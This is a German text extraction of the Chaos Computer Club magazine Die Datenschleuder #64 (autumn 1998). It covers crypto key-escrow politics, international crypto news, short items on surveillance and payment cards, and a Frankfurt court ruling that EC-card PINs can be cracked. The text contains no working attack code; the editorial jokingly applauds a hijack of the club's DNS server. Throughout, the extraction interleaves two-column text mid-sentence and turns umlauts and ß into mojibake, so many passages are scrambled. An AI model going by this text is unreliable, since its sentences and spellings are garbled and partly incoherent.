Sie sind auf Seite 1von 36

Die Datenschleuder

Das wissenschaftliche Fachblatt für Datenreisende


Ein Organ des Chaos Computer Club

Folgen der Vernetzung

Open Source Banking


EC-Karten: Beweislastumkehr
Jahresrückblick Denial Of Service

DAU MI
MEN T
KIN
O!

ISSN 0930-1045
Herbst 1998, DM 5,00
Postvertriebsstück C11301F #64
Impressum Adressen

Die Datenschleuder Nr. 64 http://www.ccc.de


III. Quartal, Herbst 1998

Herausgeber:
Erfa-Kreise des CCC
(Abos, Adressen etc.) Hamburg: Treff jeden Dienstag, 20 Uhr in den ClubrŠumen in der
Chaos Computer Club e.V., Schwenckestr. 85 oder im griechischen Restaurant gegenŸber. U-Bahn
Osterstra§e / Tel. (040) 401801-0, Fax (040) 4917689,
Schwenckestr. 85, D-20255 Hamburg,
EMail: ccc@hamburg.ccc.de
Tel. +49 (40) 401801-0,
Berlin: Club Discordia Donnerstags alle zwei Wochen 17-23 Uhr in den
Fax +49 (40) 4917689,
ClubrŠumen, Marienstra§e 11, Hinterhof, Berlin-Mitte, NŠhe Bahnhof
EMail: ofÞce@ccc.de Friedrichstra§e, Tel. (030) 28598600, Fax (030) 28598656, EMail:
Redaktion: ccc@berlin.ccc.de. Briefpost: CCC Berlin, Postfach 640236, D-10048 Berlin.
(Artikel, Leserbriefe etc.) Termine unter http://www.ccc.de/berlin/clubdiscordia.html.
Redaktion Datenschleuder, Chaosradio auf Radio Fritz und Live Stream im Internet i.d.R. am letzten
Postfach 640236, D-10048 Berlin, Mittwoch im Monat von 22.00-01.00 Uhr, Info http://chaosradio.ccc.de,
Tel +49 (30) 285 986 00 Feedback an chaos@orb.de.
Fax +49 (30) 285 986 56 Bielefeld: CCC Bielefeld: Treff jeden Dienstag um 20 Uhr in der GaststŠtte
EMail: ds@ccc.de Extra, Siekerstra§e 23, Bielefeld. Kontakt: M. Gerdes (0521) 121429, EMail:
Druck: St. Pauli Druckerei Hamburg ccc@bielefeld.ccc.de.
ViSdP: Wau Holland Kšln: Chaos Computer Club Cologne (C4), Treff jeden Dienstag um 19:30 in
den neuen (!) ClubrŠumen: Kšrnerstr. 37, 50823 Kšln, http://koeln.ccc.de,
Mitarbeiter dieser Ausgabe:
email: info@koeln.ccc.de, Tel (0177) 7213415.
Andy MŸller-Maguhn (andy@ccc.de),
Mšnchengladbach: Treff: Dienstags um 19:30 im SurferÕs Paradise, Bahner
Doobee R. Tzeck (Auf Mail Entzug),
19 in Mšnchengladbach. http://mg.ccc.de, Kontakt via gregor@ccc.de
Frank Rieger (frank@ccc.de), Tim
Ulm: CCC Ulm, Treff jeden Montag ab 19.00h im ãCafŽ EinsteinÒ in der
Pritlove (tim@ccc.de), Tobias
UniversitŠt Ulm. Info http://www.uni-ulm.de/ccc/
(tobias@ccc.de), Wau Holland
(wau@ccc.de) und weitere.
Die Liste der Chaostreffs in anderen StŠdte Þndet ihr aktuell immer auf
http://www.ccc.de/ChaosTreffs.html
Eigentumsvorbehalt:
Es ist dringend zu empfehlen dort nachzuschauen, da Zeit und Ort bei den
Diese Zeitschrift ist solange Eigen- Treffs noch nicht Ÿberall wirklich Þxiert sind. Deshalb sind alle Angaben
tum des Absenders, bis sie dem Ge- hier ohne GewŠhr. Wer selbst einen Chaostreff ins Leben rufen mšchte,
fangenen persšnlich ausgehŠndigt Þndet alle nštigen Angaben auf obiger Webseite.
worden ist. Zur-Habe-Nahme ist
keine persšnliche AushŠndigung im
Sinne des Vorbehalts. Wird die Zeit- Chaos Family
schrift dem Gefangenen nicht ausge- Bielefeld: FoeBuD e.V., Treff jeden Dienstag um 21.00 Uhr im CafŽ
hŠndigt, so ist sie dem Absender mit (Wissens)Durst in der Heeper Str. 64. PUBLIC DOMAIN
dem Grund der NichtaushŠndigung Veranstaltungsreihe: jeden 1. Sonntag im Monat ab 15 Uhr im Bunker
in Form eines rechtsmittelfŠhigen Ulmenwall, Kreuzstr. 0. siehe http://www.foebud.org/. Briefpost: FoeBuD
e.V., Marktstr. 18, D-33602 Bielefeld, Fax. (0521) 61172, Mailbox (0521) 68000,
Bescheides zurŸckzusenden.
Telefon-Hotline (0521) 175254, Mo-Fr 17-19 Uhr. EMail:
foebud@bionic.zerberus.de. http://www.foebud.org.
Copyright (C) bei den Autoren
Stuttgart: Computerrunde Suecrates, norman@delos.stgt.sub.org.
Abdruck fŸr nichtgewerbliche
…sterreich: Public Netbase, http://www.t0.or.at/
Zwecke bei Quellenangabe erlaubt.
Engagierte ComputerexpertInnen, Postfach 168, A-1015 Wien ?
USA: 2600, http://www.2600.com

Die Datenschleuder #63 Herbst 1998


Editorial

Liebe Hacksportfreunde,
die Diskussion um die Sicherheit von EC-
Karten nimmt kein Ende. Warum auch? Vor
kurzem erkannte aber auch das Amtsgericht
Frankfurt am Main, da§ die angeblich so mi§-
brauchsfeindliche Sicherung der Magnetkarten
doch eher gaunerfreundlich zu sein scheint.
Der Pool-Key, der systemweit einheitliche
Zugangscode zu den schŸtzenswerten Magnet-
daten, entpuppt sich dabei als Sollbruchstelle. Ist
er einmal einer ausreichend kriminellen Gruppe
bekannt, ist JEDE Karte auf diesem Planeten ein
potentieller Jackpot. Dies hat sich natŸrlich auch
bei den Edes rumgesprochen Ð wie sonst lie§e
sich das gestiegene Interesse an Geldautomaten
erklŠren? Auch sehr aktiv sind zu unserer grš§ten
700-900 Geldautomatenanlagen (!) sind laut Freude die zahlreichen Chaostreffs, die sich in
ofÞzieller Darstellung in den letzen Jahren den letzten Monaten in ganz Deutschland (und
ãabgŠngigÒ. Was unter diesem Terminus zu anderen LŠndern) gebildet haben. Die Erfah-
verstehen ist verdeutlicht unser Daumenkino rungen, die dort gemacht wurden, werden sicher-
rechts oben: Die rumŠnischen Panzerknacker lich auf dem diesjŠhrigen Congress zur Sprache
sacken hier nicht nur die GeldbŸndel, sondern kommen. Wer einen Treff in seiner NŠhe sucht, sei
gleich den ganzen Apparat ein. Da sind dezent auf unseren Web Server verwiesen: wir
offensichtlich nicht nur ganz blšde Gangster am halten dort eine stets aktuelle Liste aller Treffs
Werk. und Erfa-Kreise vor.
Wieauchimmer Ð auch der CCC ist vor AnlŠ§lich der 1 000 000. Ausgabe der Daten-
EinbrŸchen nicht gefeit. Anfang August wurde schleuder wollen wir Euch ein weiteres Mal
unser DNS-Server Opfer einer Hackattacke und ermuntern, Eure Artikel einzureichen. Brauch-
schwupps war www.ccc.de auf einmal ganz wo bares Material wird nach wie vor mit Freiabos fŸr
anders. Der CCC gratuliert den schšpferisch krea- sich oder seine Freunde belohnt.
tiven Aktiven zur gelungenen Trainingsrunde. We Viel Spa§ am GerŠt!
are amused. Weiter so. Treibt Hacksport! Das Chaos im Herbst

index.html
Krypto-Politik ❒❒❒❒■ JahrtausendendߟgelÞguren ■❒❒❒■
International Crypto-News ❒❒❒■■ Der kaputte Konr@d ■❒❒■❒
CRD Kurzmeldungen ❒❒■❒■ Nach uns der SYN-Flood ■❒❒■■
Hšllenmaschinenbau erfolgreich ❒❒■■■ Deutsche Banken ■❒■■■
EC-Kartenurteil des AG FFM ❒❒■■■ Hackaraoke ■■■❒❒
Aus aller Welt ❒■■❒■ KiPo-Hetze der Kripo ■■■❒■
ADSL Feldversuch ❒■■■■ Quellen im Netz ■■■■■

Die Datenschleuder #64 Herbst 1998


Krypto-Politik

Höhere Interessen kündigen sich Gesetzen formulierte 2 jŠhrige Frist zum Aufbau
drohend an Der Versuch des der global key escrow structure lŠuft Ende 1998
deutschen Innenministers Kanther, ab. Die Durchsetzung des amerikanischen
eine Mehrheit für seinen erstmals Vorhabens wurde durch eine mehrgleisige
auf dem BSI-Kongress im April Strategie auf den Weg gebracht. ZunŠchst wurden
1997 geäußerten Vorstoß zur allen amerikanischen Firmen die Mšglichkeit
angeboten, die nŠchsten 2 Jahren Ihre Software
Krypto-Regulierung in
quasi mit beliebigen kryptographischen Funk-
Deutschland zu finden, ist ja tionen und SchlŸssellŠngen zu versehen. Um die
erstmal gescheitert. entsprechende Genehmigung fŸr den Zeitraum
Anfang 1997 bis Ende 1998 zu bekommen, mu§-
Das hat allerdings auch mit dem Wahlkampf ten sie lediglich fŸr diesen Zeitraum den Aufbau
zu tun; Kanzler Kohl hat rechtzeitig erkannt, da§ eines entsprechendes key escrowing zusagen. Auf
Krypto-Regulierung kein dem anderen Gleis reiste US-
Thema ist, mit dem sich Sonderbotschafter Aaron
Wahlen gewinnen lassen und die "befreundeten" Staaten ab
deswegen rechtzeitig ein und bearbeitete die ent-
Machtwort innerhalb der sprechend zustŠndigen Stellen
Fraktion gesprochen. mit seinem Propaganda-Mate-
Hintergrund des rial Ÿber deren Inhaltsstoffe
Aktionismus vom April 1997 einiges aber nicht alles bekannt
war ein Ereigniss 4 Monate ist. Mindestens die HŠlfte der
vorher; der fŸr die Durch- Akten dŸrften unter dem
setzung des nordamerika- Stichwort "Innere Sicherheit"
nischen amerikanischen "global bzw. "Organisierte Kriminali-
Key-Escrow Plans"* zustŠndige tŠt" abheftbar sein.
US-Sonderbotschafter Aaron Da§ Kanther mit seinem
hatte Bundeskanzler Kohl und Vorsto§, die amerikanischen
Innenminister Kanther im Interessen in Deutschland zu
Dezember 1996 einen Besuch kommunizieren und durch-
abgestattet. zusetzen gescheitert ist, stimmt
Wen er bei dieser Gelegen- nicht wirklich. Denn eines hat
heit noch besuchte und mit uns die Kanthersche Diskus-
welchen Mitteln diese hohen sion geklaut: 2 Jahre Zeit. 2
Vertreter unserer ehrwŸrdigen Jahre, die wir letztlich dafŸr
Regierung auf die US-Linie brauchten, den Politikern und
gebracht wurden, ist nur der …ffentlichkeit zu
ansatzweise bekannt. Vieles liegt im Bereich der vermitteln, warum es nicht sinnvoll sein kann,
Spekulation; allerdings ist mitunter von da§ jeder BŸrger den NachschlŸssel zu seiner
entsprechend langfristig positionierten VertrŠgen Wohnung bei der šrtlichen Polizeidienststelle hin-
die Rede, deren Wurzeln noch aus den Zeiten der terlegen mu§. Von wegen die Frage nach der
BesatzungsmŠchte stammen. Sicherheit von Polizeidienststellen und der
Wiedemauchimmersei, seitdem sind ja fast 2 Bestechlichkeitsquote von Polizeibeamten;
Jahre vergangen. Die in den amerikanischen Schaffung zentraler Begehrlichkeiten.

Herbst 1998 Die Datenschleuder #64


Krypto-Politik

Diese 2 Jahre wurden in Europa eben nicht


dazu genutzt, einen VerschlŸsselungsstandart zu
entwickeln, mit dem alle Internetnutzer
standartmŠssig ihre Datenpostkarten mit einem
Umschlag versehen.
Das eine was jetzt passiert ist die Macht des
faktischen. Die Dominanz amerikanischer
Software fŸhrt jetzt gegen Ende 1998 dazu, da§
Key-Escrow etabliert wird.
Zum anderen hatten sich Aaron offenbar von
seinem Treff im Dezember 1996 noch etwas mehr
von der "befreundeten" Deutschen Regierung
versprochen. †blicherweise wird wohl eine etwas
konsequentere Durchsetzung von Befeh... Šh
Vorschlagen erwartet. Zeitpunkt des Besuches Innenminister ist. Aber
Jetzt gibt«s nŠmlich gerade ein bi§chen der Einßu§ der amerikanischen Regierung auf die
Verstimmungen. Nachdem es die Enquete- deutsche dŸrfte auch einigerma§en unabhŠngig
Kommission des Deutschen Bundestages von dem Unterhaltungsspiel sein, was wir unter
immerhin geschafft hat, in ihrem Bericht zu dem Begriff "Wahlen" kennen.
"Sicherheit und Schutz im Netz" quasi DiesbezŸgliche Erkenntnisse kšnnten im
einvernehmlich quer durch alle Parteien die jetzigen Kontext noch einen wichtigen
EinschŠtzung, eine Regulierung von Mosaikstein bilden. Immer her damit.
Kryptographie nicht fŸr sinnvoll zu erachten, dar- Historisch betrachtet ein interessanter
gestellt hat, ist die US-Regierung etwas minder Zeitraum, um die entsprechenden
begeistert (mal nebenbei: es kšnnte sich an dieser MachtverhŠltnisse zu beobachten. Vielleicht gibt
Stelle herausstellen, da§ die Enquete-Kommission es noch mal einen Kinderpornoskandal mit
tatsŠchlich einen Sinn gehabt hat. Dies lŠ§t sich Einsatz von Krypto? Oder ein paar wichtige
anhand der anderen erstellten Berichte und der Fšrderer von VerschlŸsselung werden liquidiert?
Arbeitsweise nicht zwangslŠuÞg schlu§folgern). Fragen Ÿber Fragen, die es noch zu klŠren gilt.
Offenbar ist die Geduld von Sonderbotschafter
Aaron und seinem Dienstherrn erschšpft. Er hat * das ziemlich umfangreiche Gesetzeswerk,
schlechte Laune und hat einen verhŠltnissmŠssig welches die Kryptoregulierung vom US-
kurzfristigen Besuch mit verschiedenen Terminen Verteidigungsministerium (DoD) zum
bei deutschen Stellen im Zeitraum vom 10. - 15. Wirtschaftsministerium (DoC) und den Aufbau
Oktober 1998 angekŸndigt. Oder sagen wir mal, der global key escrow structure beschreibt ist
nicht direkt angekŸndigt, aber irgendwie kochen irgendwo unter
die Jungs bei Ihrer Kommunikation auch nur mit http://www.epic.org/crypto/export_controls
Wasser. zu Þnden: Federal Register, Dec 30, 1996 (Vol 61,
Das sollte fŸr uns als erklŠrte Gegner der Number 251, Rules and Regulations, Page 68572-
Regulierung von Kryptographie ein wichtiger 68587 from the federal register via GPO Access
Termin im Kalender fŸr entsprechenden (wais.access.gpo.gov)).
Aktionismus sein.
Beim Entstehen dieses Artikels kann ja noch andy@ccc.de
nicht mal prognostiziert werden, wer zum

Die Datenschleuder #64 Herbst 1998


International Crypto News

"Key Recovery and Export Licensing Intel plans for world domination
Proposal" von Netscape Good afternoon gentlemen,
I've been reading the correspondence on the possibility
Amended Version 0.9 - February 19, 1997 of govt keystroke access with some interest. I'm in a
DRAFT - Netscape ConÞdential slightly odd position as I'm responsible for security in
[By hand:] (Netscape counsel agreed with release.) one of the larger wintel companies. As such I've been
getting quite a feeling of deja vu reading your mails.
Intel and others are moving in exactly this direction
INTRODUCTION: This is a proposal from Netscape
with a number of initiatives, most notably the PC98,
Communications Corporation regarding key recovery
PCXX, and "Wired For Management". WfM in
features in its client and server products. A business
particular is very scary - one of the components is a
timeline is included.
facility for PC's to download and run digitally signed
EXECUTIVE SUMMARY: The key recovery proposal software before the OS is booted - between "the end of
consists of two separate parts. The Þrst part addresses BIOS initialisation and when control is transferred to a
the secure mail (S/MIME) keys (and keys for other high-level OS" in the words of one Intel document. The
local applications) and the second part addresses the code is veriÞed by routines embedded in the BIOS and
SSL keys and related issues. Where possible, Netscape will allegedly use some subset of X.509v3 and PKCS#1.
plans to offer voluntary recovery features for some
As so often happens in circumstances like this I can't
encryption private keys. Corporate customers can deÞ-
risk passing documents directly as I can't be sure of
ne their own key recovery policies. They may decide to
their provenance - I really have no idea which ones are
require key recovery for email applications as well as
now considered trade secrets and which have been
any other application that stores encrypted Þles on
made public. Instead I recommend you have a look at
local or network disks.
the Intel WfM site http://www.intel.com/ial/wfm/
Support for escrow of encryption private keys may be with particular reference to the "Pre-Boot Execution
achieved as follows: Netscape client and server Environment" (PXE) and "System Management BIOS"
products offer CertiÞcate Authorities the capability to SMBIOS). The Microsoft pc98 site is at
only issue a certiÞcate after the private key has been http://www.microsoft.com/hwdev/pc98.htm and
escrowed with an entity chosen by the Intranet the Intel one at
administrator for security policy. The certiÞcate will http://developer.intel.com/design/pc98/
indicate that the corresponding private key has been
And, DM reminds of the DIRT program Ray
escrowed.
Arachelian Þrst posted here: There's an article on page
The proposed plan for SSL does not use explicit escrow 37 of the July 6, 1998 issue of NetworkWorld about a
for SSL keys at the client or the server sides. Rather, new software product for Windows machines that is
since SSL only encrypts data between the client and basically a trojan horse that allows access to all
the server such that the decrypted data is available on keystrokes and Þles on a system from a remote
the server (and clients in some cases), other entities can "America's Most Wanted"-type HQ. I can't Þnd the
obtain the data from the server directly in the case article online at <http://www.networkworld.com>,
access to the plain text data is needed. but you can go the the company's site at
The main point stressed here is that key recovery is <http://www.thecodex.com/dirt.html> to see it.
useful for applications that enable storage of encrypted Sale of DIRT is "restricted to military, government, and
data and should be offered (as an optional feature) in a law enforcement agencies", the article says.
product line, but may not actually provide the desired
result in some other applications. A plan that attempts
to escrow all keys under all scenarios is perhaps too KRAP is at it in the IETF
general and will face issues with scalability,
distribution and legal issues with the escrowed private It has come to my attention that the KRAP (key
keys. recovery alliance program) has submitted an I-D (inter-
net draft) to the IETF for adding GAK (government
[...]
access to keys) to the IPSEC protocols:
[http://www.jya.com/nscp-foia.htm]

Herbst 1998 Die Datenschleuder #63


ftp://ftp.ietf.org/internet-drafts/draft-
rfced-exp-markham-00.txt

ISAKMP Key Recovery Extensions

7. AUTHOR INFORMATION
Tom Markham
Secure Computing Corp
2675 Long Lake Road
Roseville, MN 55113 USA
Phone: 651.628.2754, Fax: 651.628.2701
EMail: tom_markham@securecomputing.com

I consider this a perversion of the standards process of


the IETF to advance a political agenda which must be In the 56-page order Judge Campos reviews the princi-
stopped at all cost. pal actions in the suit, and to buttress the order for
Below are the e-mail addresses of some people that NSA to tell him what it knows about the intercepts
you should write (politely) expressing your objections invokes recent FOIA regulations which more stringent-
to any such additions to the protocols: ly require intelligence agencies to substantiate the use
IPSEC Chairs: of the "Glomar response" in refusing to afÞrm or deny
Theodore Ts'o <tytso@mit.edu> the existence of information on the grounds that to do
Robert Moskowitz <rgm@icsa.net> so would harm national security.
Security Area Directors: He states that case law requires more diligent review
Jeffrey Schiller <jis@mit.edu> in the case of "Glomarization," so he is obligated to
Marcus Leech <mlecch@nortel.ca> make a review in this instance. He states that based on
As I mentioned before, be polite. These people are not what NSA has heretofore provided the court,
the ones proposing GAK be added to the IPSEC withholding of information on these intercepts does
protocols. They have put a lot of time and effort in not appear justiÞed.
forwarding the cause for strong encryption. They Campos has reviewed public documents on allegations
should be made aware of the communities objections of the Swiss Þrm Crypto AG's "spiking" of its
to these attempts by KRAP. cryptographic equipment (with direction by NSA for
backdoors) then selling it to Libya and Iran, Crypto
AG's employee Hans Buehler's story of the work,
"William H. Geiger III" <whgiii@invweb.net> Reagan's statement on the intercepts, and other
reports, and Þnds that while the stories are not
authoritative of the USG position, they do warrant his
NSA Ordered to Tell Secrets detailed review of NSA's Glomar response.
In an April 30 Memorandum Opinion and Order Campos says, paraphrased, "if NSA continues to have
Senior US District of New Mexico Judge Santiago the right it claims in this case to determine what is
Campos has ordered the National Security Agency to secret and what is not, then it can declare anything
produce in camera evidence that it can refuse to secret and thereby undercut the very purpose of the
respond to allegations of NSA intercepts of Libyan and FOIA. That is not acceptable."
Iranian encrypted messages in the 1980s. It's an impressive summary of the legal conßict
http://jya.com/whp043098.htm (102K) between the public's right to know and governmental
This order was issued in repsonse to cryptographer secrecy. And may help ease access information on NSA
Bill Payne's FOIA request for the information as part of global surveillance operations. Or, if Campos decides
his wrongful termination suit against NSA and Sandia in NSA's favor, may shut the door more securely.
National Laboratory.
John Young <jya@pipeline.com>

Die Datenschleuder #64 Herbst 1998


Chaos Realitäts Dienst: Kurzmeldungen

Auswandern? Hacken ist in Freunden oder der Familie fehlt: "Starke soziale
Kontakte werden durch schwŠchere ersetzt."
Neuseeland legal
MŸnchen (PC-WELT/5.08.98?) - Das Paradies
Kotzen? McDonald's soll Trendsetter
der Hacker: Nach Meinung von Reg Hammond, bei Geldkarte werden
verantwortlich fŸr die Computerrichtlinien im
Handelsministerium von Neuseeland, kann MŸnchen (Reuters 31.7.1998) - Die Schnell-
jemand, der in einen fremden Rechner eindringt, restaurant-Kette Mc Donald's soll im deutschen
zwar gegebenenfalls wegen Diebstahls oder Handel dem bargeldlosen Zahlungsverkehr mit
"unbefugten Betretens" verantwortlich gemacht der Geldkarte zum Durchbruch verhelfen. Der
werden, doch der Hackversuch selbst ist nicht
strafbar. Rechtsanwalt Ken Moon geht sogar noch
weiter: "Unbefugtes Betreten wird nur dann zum
Verbrechen, wenn ein anderes Delikt hinzu-
kommt, etwa Einbruch". Wer lediglich neugierig
ist, macht sich daher nicht schuldig. Hinzu
kommt, dass das Gesetz sich direkt auf das unbe-
fugte Betreten von Land oder persšnlichem
Eigentum bezieht. Intellektuelles Eigentum wird
in Neuseeland als nicht greifbar und damit nicht
als reales Eigentum angesehen. Selbst das
Lšschen oder Kopieren von Dateien sei daher mit
ziemlicher Sicherheit nicht verfolgbar. Trotzdem
haben weder die Regierung noch die Opposition
derzeit die Absicht, ein Gesetz gegen diese Art
Verbrechen im Netzwerk auf den Weg zu bringen. Deutsche Sparkassen und Giroverband kŸndigte
am Freitag zusammen mit dem Restaurant-
Ausschalten? "Internet macht Unternehmen in MŸnchen an, in einigen Monaten
wŸrden in allen 870 McDonald's Restaurants
depressiv" Terminals fŸr Geldkartenbezahlung und
Geldkarten-LadegerŠte installiert. Das Restaurant-
(ARD/ZDF Videotext, 06.09.98) - Je hŠuÞger Unternehmen sei damit der grš§te Kooperations-
Menschen im Internet unterwegs sind, desto partner der Sparkassen in Sachen Geldkarte. Ziel
depressiver und einsamer fŸhlen sie sich. der Zusammenarbeit sei es, die Geldkarte bei den
Das ist das Ergebnis einer neuen Studie der Verbrauchern populŠr zu machen.
UniversitŠt Pittsburgh. Danach spielt es auch Daneben testet der Sparkassenverband mit der
keine Rolle, wie Menschen das Internet benutzen: Deutschen Bahn auf einer Strecke in Baden-
Ob sie Chatrooms besuchen, E-Mails austauschen WŸrttemberg die Akzeptanz der "elektronischen
oder nach Nachrichten surfen. Geldbšrse". Weitere Kooperationen, etwa mit der
Der Grund liegt nach Ansicht des Sozial- Telekom bei MŸnzfernsprechern, wŸrden
psychologen Robert Kraut darin, da§ die im angestrebt, sagte Manfred KrŸger vom
Internet verbrachte Zeit fŸr Kontakte mit Sparkassenverband.

Herbst 1998 Die Datenschleuder #63


feed us: crd@ccc.de

Ein Arbeitsplatzabbau durch den Einsatz der


Bezahl- Terminals ist bei McDonald's Deutschland
nach den Worten von Marketing-Vorstand Rolf
Kreiner nicht vorgesehen. Vielmehr sollten die
BeschŠftigten mehr Zeit fŸr den Kunden-Service
haben.

Lage peilen? Handys mit GPS-Ortung


(Computerwoche 24.08.1998) - Ericsson und
Nokias werden ihre Handys kŸnftig mit
satellitengestŸtzten Ortungsmšglichkeiten
ausstatten. Dabei greifen die Hersteller auf eine
Technologie der Sirf Technology zurŸck, die auf
dem Global Positioning System (GPS) beruht.
Hintergrund des Lizensabkommens ist eine US-
Vorschrift, die ab dem Jahr 2001 nur noch den
Verkauf von Handys mit Funktionen zur
Positionsbestimmung erlaubt. Wußtet Ihr schon?

Briefträger beißen? Post sammelt Éwas ein Nštingspasswort ist? Das ist fŸr den
Fall, da§ man jemandem die Pistole an den Kopf
Daten über Häuser hŠlt um ihn dazu zu bringen, sich einzuloggen.
Nach Eingabe des Nštingspassworts kommt er
(ARD/ZDF Videotext 05.09.1998) - Die Post zwar ins System rein, die Jungs mit den
sammelt Daten Ÿber GebŠude und GrundstŸcke Maschinengewehren kommen dann aber auch
ihrer Kunden, um die Informationen an gleich hinzu.
Werbekunden zu verkaufen. Éda§ es sich natŸrlich auch bei einem
Ein Post-Sprecher bestŠtigte Angaben der Nštingspasswort um eine geschickt getarnte Back
"Bild"-Zeitung, wonach die Post Daten Ÿber 16 Door handeln kšnnte?
Mio.GebŠude gesammelt habe. Die Post spioniere Éda§ wg. der Umstellung auf verschlŸsseltes
jedoch niemand aus. Es wŸrden keine personen- http (https) von www.ccc.de die privaten
bezogenen Daten gesammelt. Die "Bild"-Zeitung Telekommunikationskosten einiger BSI-
zitierte jedoch aus einem Postmagazin fŸr Mitarbeiter nach hochrangigen Aussagen
GeschŠftskunden, wonach die Daten beispielswei- gestiegen ist? Die Firewall des BSI erlaubt beim
se mit Alter und Kaufkraft der Bewohner †bergang zwischen Intranet ins Internet diesen
kombiniert werden kšnnen. Dienst nicht ;-)
Der Bonner Datenschutzbeauftragte Jacob Éda§ es Anzeichen dafŸr gibt, da§ sich die
nannte das Vorgehen der Post in der Zeitung behšrdlich (noch) nicht zugelassenen IMSI-
"problematisch." Catcher (GSM-Zellensimulator, der
VerschlŸsselungsmodus 0 aktiviert) bereits in
privaten HŠnden in Deutschland im Einsatz
beÞnden?

Die Datenschleuder #64 Herbst 1998


EFF: Höllenmaschinenbau erfolgreich

Die persönliche Geheimnummer umkehr zu Gunsten der Kunden absehbar. Das


(PIN) auf EC-Karten mit DES- lšst nicht alle Probleme, aber einige. Der CCC
Verfahren kann von Unbefugten bleibt am Ball. Die Umstellung der Banken auf
geknackt werden. Das hat das neue Verfahren garantiert nicht, da§ diese
Amtsgericht Frankfurt (Main) wirklich besser sind. Gut unterrichtete Kreise
bestätigt und eine Frankfurter meinen, da§ etliche Banken bei Triple-DES wegen
des Umstellungsaufwandes zweimal den alten
Bank zur Rückerstattung der vom
SchlŸssel verwenden.
EC-Kartendieb abgehobenen Auch die freie Wahl einer PIN durch den
Summe verurteilt. Kunden lšst nicht alle Probleme, sondern schafft
neue, wenn die Banken - wie bisher - an den

D ie Bank hatte auf ein Mitverschulden der


Kontoinhaberin plŠdiert. Das Gericht: PIN-
Nr. verschlossen aufbewahrt, also "zwingende"
Kosten fŸr VerbraucheraufklŠrung sparen. Denn
dann kommen Geburtsdaten oder die eigene
Telefonnummer zum Einsatz.
Schlu§folgerung, da§ der TŠter die Nummer Und auch beim besten PIN-Verfahren bleibt
entschlŸsselt hat. Hilfreich war die real existieren- die Mšglichkeit, mit etwas GlŸck in drei
de "Hšllenmaschine" der Electronic Frontier Versuchen die PIN zu erraten - dann wird die
Foundation sowie der Umstand, da§ die Bank Karte ein Lottozettel fŸr Taschendiebe. Bei der in
sich weigerte, dem CCC einen Geldausgabe- Deutschland Ÿblichen Urteilsargumentation wird
automaten zum Nachweis der Knackbarkeit zur die Verantwortung dem Karteninhaber
VerfŸgung zu stellen. Hier AuszŸge aus dem zugeschoben.
Urteil, Volltext in de.org.ccc. Damit ist Ð
zumindest fŸr alte ec-Karten Ð eine Beweislast- wau@cccc.de

Sparkassen entsprechend belastet. Die KlŠgerin


EC-Karten Urteil des Amtsgerichts bemerkte den Diebstahl am 26.2.1997 und lie§ die
FFM v. 01.09.1998 (gekürzt) Karten am 26.2.1997 um 11:48 Uhr sperren. [...]
Unstreitig hat die KlŠgerin die ihr von der Beklagten
Amtsgericht Frankfurt am Main Aktenzeichen 30 C ausgegebene ec-Karte zuvor noch nie in Zusammen-
2119 / 97 - 45, Urteil...VerkŸndet am: 01.09.1998 hang mit der PIN benutzt, also weder an Geldausgabe-
Im Rechtsstreit ... - KlŠgerin - ... gegen die ZZZZZZZZ automaten noch POS-Terminals. [...]
- Bank ... - Beklagte - hat das Amtsgericht Frankfurt am Die KlŠgerin behauptet, sie sei ihrer Verpßichtung zur
Main ... 31.7.1998 fŸr Recht erkannt: Die Beklagte wird Geheimhaltung der PIN nachgekommen. Sie habe die
verurteilt, ... nebst ... Zinsen ... zu zahlen. ... PIN weder auf der Karte noch sonst in irgendeiner
TATBESTAND: Die KlŠgerin ... unterhŠlt bei der Form notiert, die PIN vielmehr in einem ver-
Beklagten ein Girokonto. schlossenen Aktenkoffer verwahrt, welchen sie in ihrer
Wohnung versteckt habe.
FŸr dieses Konto war ihr von der Beklagten eine ec-
Karte mit Magnetstreifen sowie eine persšnliche Die KlŠgerin ist der Ansicht, es spreche auch kein
Geheimnummer (PIN) ausgehŠndigt worden. Anscheinsbeweis dafŸr, da§ sie dem TŠter durch einen
pßichtwidrigen Umgang mit der PIN die Kenntnis der
Im Februar 1997 wurden der KlŠgerin aus ihrer
PIN ermšglicht habe, da mittlerweile durch zahlreiche
Handtasche die von der Beklagten ausgegebene ec-
Gutachten nachgewiesen worden sei, da§ die TŠter die
Karte sowie eine weitere ec- und s-Karte einer
PIN selbststŠndig durch Ausprobieren oder
Sparkasse gestohlen. Mit diesen Karten wurden im
EntschlŸsseln anhand der auf der Karte gespeicherten
Zeitraum vom 20.2.1997 bis 26.2.1997 an verschiedenen
Daten ermitteln konnten.
Geldautomaten (GAA) und POS-Terminals Geld
abgehoben bzw. Rechnungen beglichen, die Konten Die KlŠgerin beantragt, die Beklagte zu verurteilen, ...
der KlŠgerin von den kartenausgebenden Banken bzw. zu zahlen.

Herbst 1998 Die Datenschleuder #64


EC-Karten Urteil (Auszug)

Die Beklagte beantragt, die Klage abzuweisen.


Die Beklagte bestreitet, da§ die PIN selbststŠndig
durch EntschlŸsseln anhand der auf der Karte
gespeicherten Daten ermittelt werden kšnne.
Sie behauptet, es sei auch heute noch technisch
ausgeschlossen, da§ ein Dieb die PIN aus der Karte
entschlŸsseln kšnne, da diese nicht auf der Karte
gespeichert sei, sondern erst unter Verwendung des
institutseigenen DES-SchlŸssels errechnet werde. Die
EntschlŸsselung des DES-SchlŸssels sei mit
herkšmmlichen Mitteln nicht mšglich, da hierfŸr das
systematische Durchprobieren aller denkbaren
SchlŸssel erforderlich wŠre. Da der SchlŸssel des DES-
Algorithmus 56 Bits umfasse, gŠbe es Ÿber 70
Billiarden verschiedene Mšglichkeiten.
Ein Dieb sei folglich nur dann in der Lage, mit Hilfe
gestohlen und von Unbekannten mittels der
einer gestohlenen ec-Karte an einem Geldausgabe-
gestohlenen ec-Karte die mi§brŠuchlichen
automaten eine Abhebung zu tŠtigen, wenn ihm mit
Transaktionen durchgefŸhrt. [...]
der Karte auch die PIN in die HŠnde gefallen sei.
Die Beklagte wŠre daher nur dann zur Belastung des
Aus diesem Grunde ginge die Ÿberwiegende
Girokontos der KlŠgerin berechtigt gewesen, wenn die
Rechtssprechung davon aus, da§ bei einer Abhebung
KlŠgerin ihre vertraglichen Verpßichtungen aus
an Geldausgabeautomaten der sogenannte Beweis des
Abschnitt II Ziffer 7.4 der Besonderen Bedingungen fŸr
ersten Anscheins dafŸr spreche, da§ der Karteninhaber
ec-Karten verletzt hŠtte (pVV).
die Abhebungen selbst vorgenommen habe, oder ein
Dritter sie in Kenntnis der PIN getŠtigt habe. [...] Ein derartiger Anspruch setzt voraus, da§ die karten-
